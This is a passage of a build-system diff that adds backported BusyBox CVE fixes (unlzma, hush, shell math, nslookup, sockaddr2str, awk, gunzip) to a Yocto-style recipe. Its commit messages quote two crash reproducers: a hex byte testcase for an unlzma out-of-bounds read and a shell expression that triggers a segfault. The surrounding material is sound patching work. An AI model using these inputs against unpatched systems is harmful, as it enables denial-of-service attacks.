+Signed-off-by: Chen Qi <Qi.Chen@windriver.com>
+Signed-off-by: Akash Hadke <Akash.Hadke@kpit.com>
+---
+ archival/libarchive/decompress_gunzip.c | 12 ++++++++++--
+ 1 file changed, 10 insertions(+), 2 deletions(-)
+
+diff --git a/archival/libarchive/decompress_gunzip.c b/archival/libarchive/decompress_gunzip.c
+index eb3b64930..e93cd5005 100644
+--- a/archival/libarchive/decompress_gunzip.c
++++ b/archival/libarchive/decompress_gunzip.c
+@@ -220,10 +220,20 @@ static const uint8_t border[] ALIGN1 = {
+  * each table.
+  * t: table to free
+  */
++#define BAD_HUFT(p) ((uintptr_t)(p) & 1)
++#define ERR_RET     ((huft_t*)(uintptr_t)1)
+ static void huft_free(huft_t *p)
+ {
+ 	huft_t *q;
+ 
++	/*
++	 * If 'p' has the error bit set we have to clear it, otherwise we might run
++	 * into a segmentation fault or an invalid pointer to free(p)
++	 */
++	if (BAD_HUFT(p)) {
++		p = (huft_t*)((uintptr_t)(p) ^ (uintptr_t)(ERR_RET));
++	}
++
+ 	/* Go through linked list, freeing from the malloced (t[-1]) address. */
+ 	while (p) {
+ 		q = (--p)->v.t;
diff --git a/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
new file mode 100644
index 0000000000..18bf5f19e4
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch
@@ -0,0 +1,38 @@
+From c7e181fdf58c392e06ab805e2c044c3e57d5445a Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:14:33 +0000
+Subject: [PATCH] libbb: sockaddr2str: ensure only printable characters are
+ returned for the hostname part
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ libbb/xconnect.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libbb/xconnect.c b/libbb/xconnect.c
+index eb2871cb1..b5520bb21 100644
+--- a/libbb/xconnect.c
++++ b/libbb/xconnect.c
+@@ -501,8 +501,9 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ 	);
+ 	if (rc)
+ 		return NULL;
++	/* ensure host contains only printable characters */
+ 	if (flags & IGNORE_PORT)
+-		return xstrdup(host);
++		return xstrdup(printable_string(host));
+ #if ENABLE_FEATURE_IPV6
+ 	if (sa->sa_family == AF_INET6) {
+ 		if (strchr(host, ':')) /* heh, it's not a resolved hostname */
+@@ -513,7 +514,7 @@ static char* FAST_FUNC sockaddr2str(const struct sockaddr *sa, int flags)
+ #endif
+ 	/* For now we don't support anything else, so it has to be INET */
+ 	/*if (sa->sa_family == AF_INET)*/
+-		return xasprintf("%s:%s", host, serv);
++		return xasprintf("%s:%s", printable_string(host), serv);
+ 	/*return xstrdup(host);*/
+ }
+ 
diff --git a/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
new file mode 100644
index 0000000000..4a1960dff2
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0001-mktemp-add-tmpdir-option.patch
@@ -0,0 +1,81 @@
+From ceb378209f953ea745ed93a8645567196380ce3c Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Thu, 24 Jun 2021 19:13:22 +0200
+Subject: [PATCH] mktemp: add tmpdir option
+
+Make mktemp more compatible with coreutils.
+- add "--tmpdir" option
+- add long variants for "d,q,u" options
+
+Upstream-Status: Submitted [http://lists.busybox.net/pipermail/busybox/2021-June/088932.html]
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ coreutils/mktemp.c | 26 ++++++++++++++++++--------
+ 1 file changed, 18 insertions(+), 8 deletions(-)
+
+diff --git a/coreutils/mktemp.c b/coreutils/mktemp.c
+index 5393320a5..05c6d98c6 100644
+--- a/coreutils/mktemp.c
++++ b/coreutils/mktemp.c
+@@ -39,16 +39,17 @@
+ //kbuild:lib-$(CONFIG_MKTEMP) += mktemp.o
+ 
+ //usage:#define mktemp_trivial_usage
+-//usage:       "[-dt] [-p DIR] [TEMPLATE]"
++//usage:       "[-dt] [-p DIR, --tmpdir[=DIR]] [TEMPLATE]"
+ //usage:#define mktemp_full_usage "\n\n"
+ //usage:       "Create a temporary file with name based on TEMPLATE and print its name.\n"
+ //usage:       "TEMPLATE must end with XXXXXX (e.g. [/dir/]nameXXXXXX).\n"
+ //usage:       "Without TEMPLATE, -t tmp.XXXXXX is assumed.\n"
+-//usage:     "\n	-d	Make directory, not file"
+-//usage:     "\n	-q	Fail silently on errors"
+-//usage:     "\n	-t	Prepend base directory name to TEMPLATE"
+-//usage:     "\n	-p DIR	Use DIR as a base directory (implies -t)"
+-//usage:     "\n	-u	Do not create anything; print a name"
++//usage:     "\n	-d			Make directory, not file"
++//usage:     "\n	-q			Fail silently on errors"
++//usage:     "\n	-t			Prepend base directory name to TEMPLATE"
++//usage:     "\n	-p DIR, --tmpdir[=DIR]	Use DIR as a base directory (implies -t)"
++//usage:     "\n				For --tmpdir is a optional one."
++//usage:     "\n	-u			Do not create anything; print a name"
+ //usage:     "\n"
+ //usage:     "\nBase directory is: -p DIR, else $TMPDIR, else /tmp"
+ //usage:
+@@ -72,13 +73,22 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ 		OPT_t = 1 << 2,
+ 		OPT_p = 1 << 3,
+ 		OPT_u = 1 << 4,
++		OPT_td = 1 << 5,
+ 	};
+ 
+ 	path = getenv("TMPDIR");
+ 	if (!path || path[0] == '\0')
+ 		path = "/tmp";
+ 
+-	opts = getopt32(argv, "^" "dqtp:u" "\0" "?1"/*1 arg max*/, &path);
++	opts = getopt32long(argv, "^"
++	       "dqtp:u\0"
++	       "?1" /* 1 arg max */,
++	       "directory\0" No_argument       "d"
++	       "quiet\0"     No_argument       "q"
++	       "dry-run\0"   No_argument       "u"
++	       "tmpdir\0"    Optional_argument "\xff"
++	       , &path, &path
++	);
+ 
+ 	chp = argv[optind];
+ 	if (!chp) {
+@@ -95,7 +105,7 @@ int mktemp_main(int argc UNUSED_PARAM, char **argv)
+ 		goto error;
+ 	}
+ #endif
+-	if (opts & (OPT_t|OPT_p))
++	if (opts & (OPT_t|OPT_p|OPT_td))
+ 		chp = concat_path_file(path, chp);
+ 
+ 	if (opts & OPT_u) {
+-- 
+2.11.0
+
diff --git a/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
new file mode 100644
index 0000000000..2c9da33a51
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch
@@ -0,0 +1,64 @@
+From f8ad7c331b25ba90fd296b37c443b4114cb196e2 Mon Sep 17 00:00:00 2001
+From: Ariadne Conill <ariadne@dereferenced.org>
+Date: Sun, 3 Apr 2022 12:16:45 +0000
+Subject: [PATCH] nslookup: sanitize all printed strings with printable_string
+
+Otherwise, terminal sequences can be injected, which enables various terminal injection
+attacks from DNS results.
+
+MJ: One chunk wasn't applicable on 1.31.1 version, because parsing of
+SRV records was added only in newer 1.32.0 with:
+  commit 6b4960155e94076bf25518e4e268a7a5f849308e
+  Author: Jo-Philipp Wich <jo@mein.io>
+  Date:   Thu Jun 27 17:27:29 2019 +0200
+
+    nslookup: implement support for SRV records
+
+CVE: CVE-2022-28391
+Upstream-Status: Pending
+Signed-off-by: Ariadne Conill <ariadne@dereferenced.org>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ networking/nslookup.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/networking/nslookup.c b/networking/nslookup.c
+index 24e09d4f0..89b9c8a13 100644
+--- a/networking/nslookup.c
++++ b/networking/nslookup.c
+@@ -404,7 +404,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ 				//printf("Unable to uncompress domain: %s\n", strerror(errno));
+ 				return -1;
+ 			}
+-			printf(format, ns_rr_name(rr), dname);
++			printf(format, ns_rr_name(rr), printable_string(dname));
+ 			break;
+ 
+ 		case ns_t_mx:
+@@ -419,7 +419,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ 				//printf("Cannot uncompress MX domain: %s\n", strerror(errno));
+ 				return -1;
+ 			}
+-			printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, dname);
++			printf("%s\tmail exchanger = %d %s\n", ns_rr_name(rr), n, printable_string(dname));
+ 			break;
+ 
+ 		case ns_t_txt:
+@@ -431,7 +431,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ 			if (n > 0) {
+ 				memset(dname, 0, sizeof(dname));
+ 				memcpy(dname, ns_rr_rdata(rr) + 1, n);
+-				printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), dname);
++				printf("%s\ttext = \"%s\"\n", ns_rr_name(rr), printable_string(dname));
+ 			}
+ 			break;
+ 
+@@ -461,7 +461,7 @@ static int parse_reply(const unsigned char *msg, size_t len)
+ 				return -1;
+ 			}
+ 
+-			printf("\tmail addr = %s\n", dname);
++			printf("\tmail addr = %s\n", printable_string(dname));
+ 			cp += n;
+ 
+ 			printf("\tserial = %lu\n", ns_get32(cp));
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
new file mode 100644
index 0000000000..aef8a3db85
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42374.patch
@@ -0,0 +1,53 @@
+From 04f052c56ded5ab6a904e3a264a73dc0412b2e78 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 15:07:57 +0200
+Subject: [PATCH] unlzma: fix a case where we could read before beginning of
+ buffer
+Cc: pavel@zhukoff.net
+
+Testcase:
+
+  21 01 01 00 00 00 00 00 e7 01 01 01 ef 00 df b6
+  00 17 02 10 11 0f ff 00 16 00 00
+
+Unfortunately, the bug is not reliably causing a segfault,
+the behavior depends on what's in memory before the buffer.
+
+function                                             old     new   delta
+unpack_lzma_stream                                  2762    2768      +6
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42374
+Upstream-Status: Backport [https://git.busybox.net/busybox/commit/?h=1_33_stable&id=d326be2850ea2bd78fe2c22d6c45c3b861d82937]
+Comment: testdata dropped because of binary format
+
+---
+ archival/libarchive/decompress_unlzma.c |   5 ++++-
+ testsuite/unlzma.tests                  |  17 +++++++++++++----
+ testsuite/unlzma_issue_3.lzma           | Bin 0 -> 27 bytes
+ 3 files changed, 17 insertions(+), 5 deletions(-)
+ create mode 100644 testsuite/unlzma_issue_3.lzma
+
+diff --git a/archival/libarchive/decompress_unlzma.c b/archival/libarchive/decompress_unlzma.c
+index 0744f231a1d64d92676b0cada2342f88f3b39b31..fb5aac8fe9ea0c53e0c2d7a7cbd05a753e39bc9d 100644
+--- a/archival/libarchive/decompress_unlzma.c
++++ b/archival/libarchive/decompress_unlzma.c
+@@ -290,8 +290,11 @@ unpack_lzma_stream(transformer_state_t *xstate)
+ 				uint32_t pos;
+ 
+ 				pos = buffer_pos - rep0;
+-				if ((int32_t)pos < 0)
++				if ((int32_t)pos < 0) {
+ 					pos += header.dict_size;
++					if ((int32_t)pos < 0)
++						goto bad;
++				}
+ 				match_byte = buffer[pos];
+ 				do {
+ 					int bit;
+-- 
+2.34.0
+
diff --git a/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
new file mode 100644
index 0000000000..c913eaee9c
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2021-42376.patch
@@ -0,0 +1,138 @@
+From 56a335378ac100d51c30b21eee499a2effa37fba Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Tue, 15 Jun 2021 16:05:57 +0200
+Subject: hush: fix handling of \^C and "^C"
+
+function                                             old     new   delta
+parse_stream                                        2238    2252     +14
+encode_string                                        243     256     +13
+------------------------------------------------------------------------------
+(add/remove: 0/0 grow/shrink: 2/0 up/down: 27/0)               Total: 27 bytes
+
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+(cherry picked from commit 1b7a9b68d0e9aa19147d7fda16eb9a6b54156985)
+
+Signed-off-by: Pavel Zhukov <pavel.zhukov@huawei.com>
+
+CVE: CVE-2021-42376
+Upstream-Status: Backport [https://git.busybox.net/busybox/patch/?id=56a335378ac100d51c30b21eee499a2effa37fba]
+Comment: No changes in any hunk
+---
+ shell/ash_test/ash-misc/control_char3.right   |  1 +
+ shell/ash_test/ash-misc/control_char3.tests   |  2 ++
+ shell/ash_test/ash-misc/control_char4.right   |  1 +
+ shell/ash_test/ash-misc/control_char4.tests   |  2 ++
+ shell/hush.c                                  | 11 +++++++++++
+ shell/hush_test/hush-misc/control_char3.right |  1 +
+ shell/hush_test/hush-misc/control_char3.tests |  2 ++
+ shell/hush_test/hush-misc/control_char4.right |  1 +
+ shell/hush_test/hush-misc/control_char4.tests |  2 ++
+ 9 files changed, 23 insertions(+)
+ create mode 100644 shell/ash_test/ash-misc/control_char3.right
+ create mode 100755 shell/ash_test/ash-misc/control_char3.tests
+ create mode 100644 shell/ash_test/ash-misc/control_char4.right
+ create mode 100755 shell/ash_test/ash-misc/control_char4.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char3.right
+ create mode 100755 shell/hush_test/hush-misc/control_char3.tests
+ create mode 100644 shell/hush_test/hush-misc/control_char4.right
+ create mode 100755 shell/hush_test/hush-misc/control_char4.tests
+
+diff --git a/shell/ash_test/ash-misc/control_char3.right b/shell/ash_test/ash-misc/control_char3.right
+new file mode 100644
+index 000000000..283e02cbb
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.right
+@@ -0,0 +1 @@
++SHELL: line 1: : not found
+diff --git a/shell/ash_test/ash-misc/control_char3.tests b/shell/ash_test/ash-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/ash_test/ash-misc/control_char4.right b/shell/ash_test/ash-misc/control_char4.right
+new file mode 100644
+index 000000000..2bf18e684
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.right
+@@ -0,0 +1 @@
++SHELL: line 1: -: not found
+diff --git a/shell/ash_test/ash-misc/control_char4.tests b/shell/ash_test/ash-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/ash_test/ash-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+diff --git a/shell/hush.c b/shell/hush.c
+index 9fead37da..249728b9d 100644
+--- a/shell/hush.c
++++ b/shell/hush.c
+@@ -5235,6 +5235,11 @@ static int encode_string(o_string *as_string,
+ 	}
+ #endif
+ 	o_addQchr(dest, ch);
++	if (ch == SPECIAL_VAR_SYMBOL) {
++		/* Convert "^C" to corresponding special variable reference */
++		o_addchr(dest, SPECIAL_VAR_QUOTED_SVS);
++		o_addchr(dest, SPECIAL_VAR_SYMBOL);
++	}
+ 	goto again;
+ #undef as_string
+ }
+@@ -5346,6 +5351,11 @@ static struct pipe *parse_stream(char **pstring,
+ 			if (ch == '\n')
+ 				continue; /* drop \<newline>, get next char */
+ 			nommu_addchr(&ctx.as_string, '\\');
++			if (ch == SPECIAL_VAR_SYMBOL) {
++				nommu_addchr(&ctx.as_string, ch);
++				/* Convert \^C to corresponding special variable reference */
++				goto case_SPECIAL_VAR_SYMBOL;
++			}
+ 			o_addchr(&ctx.word, '\\');
+ 			if (ch == EOF) {
+ 				/* Testcase: eval 'echo Ok\' */
+@@ -5670,6 +5680,7 @@ static struct pipe *parse_stream(char **pstring,
+ 		/* Note: nommu_addchr(&ctx.as_string, ch) is already done */
+ 
+ 		switch (ch) {
++		case_SPECIAL_VAR_SYMBOL:
+ 		case SPECIAL_VAR_SYMBOL:
+ 			/* Convert raw ^C to corresponding special variable reference */
+ 			o_addchr(&ctx.word, SPECIAL_VAR_SYMBOL);
+diff --git a/shell/hush_test/hush-misc/control_char3.right b/shell/hush_test/hush-misc/control_char3.right
+new file mode 100644
+index 000000000..94b4f8699
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.right
+@@ -0,0 +1 @@
++hush: can't execute '': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char3.tests b/shell/hush_test/hush-misc/control_char3.tests
+new file mode 100755
+index 000000000..4359db3f3
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char3.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '\' SHELL
+diff --git a/shell/hush_test/hush-misc/control_char4.right b/shell/hush_test/hush-misc/control_char4.right
+new file mode 100644
+index 000000000..698e21427
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.right
+@@ -0,0 +1 @@
++hush: can't execute '-': No such file or directory
+diff --git a/shell/hush_test/hush-misc/control_char4.tests b/shell/hush_test/hush-misc/control_char4.tests
+new file mode 100755
+index 000000000..48010f154
+--- /dev/null
++++ b/shell/hush_test/hush-misc/control_char4.tests
+@@ -0,0 +1,2 @@
++# (set argv0 to "SHELL" to avoid "/path/to/shell: blah" in error messages)
++$THIS_SH -c '"-"' SHELL
+-- 
+cgit v1.2.3
+
diff --git a/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
new file mode 100644
index 0000000000..dfba2a7e0f
--- /dev/null
+++ b/meta/recipes-core/busybox/busybox/CVE-2022-48174.patch
@@ -0,0 +1,82 @@
+From c18ebf861528ef24958dd99a146482d2a40014c7 Mon Sep 17 00:00:00 2001
+From: Denys Vlasenko <vda.linux@googlemail.com>
+Date: Mon, 12 Jun 2023 17:48:47 +0200
+Subject: [PATCH] shell: avoid segfault on ${0::0/0~09J}. Closes 15216
+
+function                                             old     new   delta
+evaluate_string                                     1011    1053     +42
+
+CVE: CVE-2022-48174
+Upstream-Status: Backport [d417193cf37ca1005830d7e16f5fa7e1d8a44209]
+Signed-off-by: Denys Vlasenko <vda.linux@googlemail.com>
+---
+ shell/math.c | 39 +++++++++++++++++++++++++++++++++++----
+ 1 file changed, 35 insertions(+), 4 deletions(-)
+
+diff --git a/shell/math.c b/shell/math.c
+index af1ab55c0..79824e81f 100644
+--- a/shell/math.c
++++ b/shell/math.c
+@@ -578,6 +578,28 @@ static arith_t strto_arith_t(const char *nptr, char **endptr)
+ # endif
+ #endif
+ 
++//TODO: much better estimation than expr_len/2? Such as:
++//static unsigned estimate_nums_and_names(const char *expr)
++//{
++//	unsigned count = 0;
++//	while (*(expr = skip_whitespace(expr)) != '\0') {
++//		const char *p;
++//		if (isdigit(*expr)) {
++//			while (isdigit(*++expr))
++//				continue;
++//			count++;
++//			continue;
++//		}
++//		p = endofname(expr);
++//		if (p != expr) {
++//			expr = p;
++//			count++;
++//			continue;
++//		}
++//	}
++//	return count;
++//}
++
+ static arith_t FAST_FUNC
+ evaluate_string(arith_state_t *math_state, const char *expr)
+ {
+@@ -585,10 +607,12 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ 	const char *errmsg;
+ 	const char *start_expr = expr = skip_whitespace(expr);
+ 	unsigned expr_len = strlen(expr) + 2;
+-	/* Stack of integers */
+-	/* The proof that there can be no more than strlen(startbuf)/2+1
+-	 * integers in any given correct or incorrect expression
+-	 * is left as an exercise to the reader. */
++	/* Stack of integers/names */
++	/* There can be no more than strlen(startbuf)/2+1
++	 * integers/names in any given correct or incorrect expression.
++	 * (modulo "09v09v09v09v09v" case,
++	 * but we have code to detect that early)
++	 */
+ 	var_or_num_t *const numstack = alloca((expr_len / 2) * sizeof(numstack[0]));
+ 	var_or_num_t *numstackptr = numstack;
+ 	/* Stack of operator tokens */
+@@ -657,6 +681,13 @@ evaluate_string(arith_state_t *math_state, const char *expr)
+ 			numstackptr->var = NULL;
+ 			errno = 0;
+ 			numstackptr->val = strto_arith_t(expr, (char**) &expr);
++			/* A number can't be followed by another number, or a variable name.
++			 * We'd catch this later anyway, but this would require numstack[]
++			 * to be twice as deep to handle strings where _every_ char is
++			 * a new number or name. Example: 09v09v09v09v09v09v09v09v09v
++			 */
++			if (isalnum(*expr) || *expr == '_')
++				goto err;
+ 			if (errno)
+ 				numstackptr->val = 0; /* bash compat */
+ 			goto num;
+-- 
+2.40.1
+
diff --git a/meta/recipes-core/busybox/busybox_1.31.1.bb b/meta/recipes-core/busybox/busybox_1.31.1.bb
index 7563368287..94aa1467df 100644
--- a/meta/recipes-core/busybox/busybox_1.31.1.bb
+++ b/meta/recipes-core/busybox/busybox_1.31.1.bb
@@ -50,7 +50,15 @@ SRC_URI = "https://busybox.net/downloads/busybox-${PV}.tar.bz2;name=tarball \
            file://0001-sysctl-ignore-EIO-of-stable_secret-below-proc-sys-ne.patch \
            file://busybox-CVE-2018-1000500.patch \
            file://0001-hwclock-make-glibc-2.31-compatible.patch \
-"
+           file://0001-decompress_gunzip-Fix-DoS-if-gzip-is-corrupt.patch \
+           file://0001-mktemp-add-tmpdir-option.patch \
+           file://CVE-2021-42374.patch \
+           file://CVE-2021-42376.patch \
+           file://CVE-2021-423xx-awk.patch \
+           file://CVE-2022-48174.patch \
+           file://0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch \
+           file://0002-nslookup-sanitize-all-printed-strings-with-printable.patch \
+           "
 SRC_URI_append_libc-musl = " file://musl.cfg "
 
 SRC_URI[tarball.md5sum] = "70913edaf2263a157393af07565c17f0"
diff --git a/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
new file mode 100644
index 0000000000..7e3d47b88c
--- /dev/null
+++ b/meta/recipes-core/busybox/files/CVE-2021-423xx-awk.patch
@@ -0,0 +1,215 @@
+From a21708eb8d07b4a6dbc1d3e4ace4c5721515a84c Mon Sep 17 00:00:00 2001
+From: Sana Kazi <Sana.Kazi@kpit.com>
+Date: Wed, 8 Dec 2021 12:25:34 +0530
+Subject: [PATCH] busybox: Fix multiple security issues in awk
+
+Description: fix multiple security issues in awk
+Origin: backported awk.c from busybox 1.34.1
+
+CVE: CVE-2021-42378
+CVE: CVE-2021-42379
+CVE: CVE-2021-42380
+CVE: CVE-2021-42381
+CVE: CVE-2021-42382
+CVE: CVE-2021-42384
+CVE: CVE-2021-42385
+CVE: CVE-2021-42386
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/busybox/1:1.30.1-6ubuntu3.1/busybox_1.30.1-6ubuntu3.1.debian.tar.xz]
+
+Comment: Refreshed first hunk and removed few hunks as they are already present in source.
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <Ranjitsinh.Rathod@kpit.com>
+
+---
+ editors/awk.c | 80 ++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 60 insertions(+), 20 deletions(-)
+
+diff --git a/editors/awk.c b/editors/awk.c
+index d25508e..4e4f282 100644
+--- a/editors/awk.c
++++ b/editors/awk.c
+@@ -272,7 +272,8 @@ typedef struct tsplitter_s {
+ /* if previous token class is CONCAT1 and next is CONCAT2, concatenation */
+ /* operator is inserted between them */
+ #define	TC_CONCAT1 (TC_VARIABLE | TC_ARRTERM | TC_SEQTERM \
+-                   | TC_STRING | TC_NUMBER | TC_UOPPOST)
++                   | TC_STRING | TC_NUMBER | TC_UOPPOST \
++                   | TC_LENGTH)
+ #define	TC_CONCAT2 (TC_OPERAND | TC_UOPPRE)
+ 
+ #define	OF_RES1     0x010000
+@@ -404,7 +405,7 @@ static const char tokenlist[] ALIGN1 =
+ 
+ #define OC_B  OC_BUILTIN
+ 
+-static const uint32_t tokeninfo[] = {
++static const uint32_t tokeninfo[] ALIGN4 = {
+ 	0,
+ 	0,
+ 	OC_REGEXP,
+@@ -1070,8 +1071,10 @@ static uint32_t next_token(uint32_t expected)
+ 	const uint32_t *ti;
+ 
+ 	if (t_rollback) {
++		debug_printf_parse("%s: using rolled-back token\n", __func__);
+ 		t_rollback = FALSE;
+ 	} else if (concat_inserted) {
++		debug_printf_parse("%s: using concat-inserted token\n", __func__);
+ 		concat_inserted = FALSE;
+ 		t_tclass = save_tclass;
+ 		t_info = save_info;
+@@ -1200,7 +1203,11 @@ static uint32_t next_token(uint32_t expected)
+ 			goto readnext;
+ 
+ 		/* insert concatenation operator when needed */
+-		if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)) {
++		debug_printf_parse("%s: %x %x %x concat_inserted?\n", __func__,
++			(ltclass & TC_CONCAT1), (tc & TC_CONCAT2), (expected & TC_BINOP));
++		if ((ltclass & TC_CONCAT1) && (tc & TC_CONCAT2) && (expected & TC_BINOP)
++		 && !(ltclass == TC_LENGTH && tc == TC_SEQSTART) /* but not for "length(..." */
++		) {
+ 			concat_inserted = TRUE;
+ 			save_tclass = tc;
+ 			save_info = t_info;
+@@ -1208,6 +1215,7 @@ static uint32_t next_token(uint32_t expected)
+ 			t_info = OC_CONCAT | SS | P(35);
+ 		}
+ 
++		debug_printf_parse("%s: t_tclass=tc=%x\n", __func__, t_tclass);
+ 		t_tclass = tc;
+ 	}
+ 	ltclass = t_tclass;
+@@ -1218,6 +1226,7 @@ static uint32_t next_token(uint32_t expected)
+ 				EMSG_UNEXP_EOS : EMSG_UNEXP_TOKEN);
+ 	}
+ 
++	debug_printf_parse("%s: returning, ltclass:%x t_double:%f\n", __func__, ltclass, t_double);
+ 	return ltclass;
+ #undef concat_inserted
+ #undef save_tclass
+@@ -1282,7 +1291,7 @@ static node *parse_expr(uint32_t iexp)
+ 			glptr = NULL;
+ 
+ 		} else if (tc & (TC_BINOP | TC_UOPPOST)) {
+-			debug_printf_parse("%s: TC_BINOP | TC_UOPPOST\n", __func__);
++			debug_printf_parse("%s: TC_BINOP | TC_UOPPOST tc:%x\n", __func__, tc);
+ 			/* for binary and postfix-unary operators, jump back over
+ 			 * previous operators with higher priority */
+ 			vn = cn;
+@@ -1350,8 +1359,10 @@ static node *parse_expr(uint32_t iexp)
+ 					v = cn->l.v = xzalloc(sizeof(var));
+ 					if (tc & TC_NUMBER)
+ 						setvar_i(v, t_double);
+-					else
++					else {
+ 						setvar_s(v, t_string);
++						xtc &= ~TC_UOPPOST; /* "str"++ is not allowed */
++					}
+ 					break;
+ 
+ 				case TC_REGEXP:
+@@ -1387,7 +1398,12 @@ static node *parse_expr(uint32_t iexp)
+ 
+ 				case TC_LENGTH:
+ 					debug_printf_parse("%s: TC_LENGTH\n", __func__);
+-					next_token(TC_SEQSTART | TC_OPTERM | TC_GRPTERM);
++					next_token(TC_SEQSTART /* length(...) */
++						| TC_OPTERM    /* length; (or newline)*/
++						| TC_GRPTERM   /* length } */
++						| TC_BINOPX    /* length <op> NUM */
++						| TC_COMMA     /* print length, 1 */
++					);
+ 					rollback_token();
+ 					if (t_tclass & TC_SEQSTART) {
+ 						/* It was a "(" token. Handle just like TC_BUILTIN */
+@@ -1747,12 +1763,34 @@ static void fsrealloc(int size)
+ 	nfields = size;
+ }
+ 
++static int regexec1_nonempty(const regex_t *preg, const char *s, regmatch_t pmatch[])
++{
++	int r = regexec(preg, s, 1, pmatch, 0);
++	if (r == 0 && pmatch[0].rm_eo == 0) {
++		/* For example, happens when FS can match
++		 * an empty string (awk -F ' *'). Logically,
++		 * this should split into one-char fields.
++		 * However, gawk 5.0.1 searches for first
++		 * _non-empty_ separator string match:
++		 */
++		size_t ofs = 0;
++		do {
++			ofs++;
++			if (!s[ofs])
++				return REG_NOMATCH;
++			regexec(preg, s + ofs, 1, pmatch, 0);
++		} while (pmatch[0].rm_eo == 0);
++		pmatch[0].rm_so += ofs;
++		pmatch[0].rm_eo += ofs;
++	}
++	return r;
++}
++
+ static int awk_split(const char *s, node *spl, char **slist)
+ {
+-	int l, n;
++	int n;
+ 	char c[4];
+ 	char *s1;
+-	regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
+ 
+ 	/* in worst case, each char would be a separate field */
+ 	*slist = s1 = xzalloc(strlen(s) * 2 + 3);
+@@ -1769,29 +1807,31 @@ static int awk_split(const char *s, node *spl, char **slist)
+ 			return n; /* "": zero fields */
+ 		n++; /* at least one field will be there */
+ 		do {
++			int l;
++			regmatch_t pmatch[2]; // TODO: why [2]? [1] is enough...
++
+ 			l = strcspn(s, c+2); /* len till next NUL or \n */
+-			if (regexec(icase ? spl->r.ire : spl->l.re, s, 1, pmatch, 0) == 0
++			if (regexec1_nonempty(icase ? spl->r.ire : spl->l.re, s, pmatch) == 0
+ 			 && pmatch[0].rm_so <= l
+ 			) {
++				/* if (pmatch[0].rm_eo == 0) ... - impossible */
+ 				l = pmatch[0].rm_so;
+-				if (pmatch[0].rm_eo == 0) {
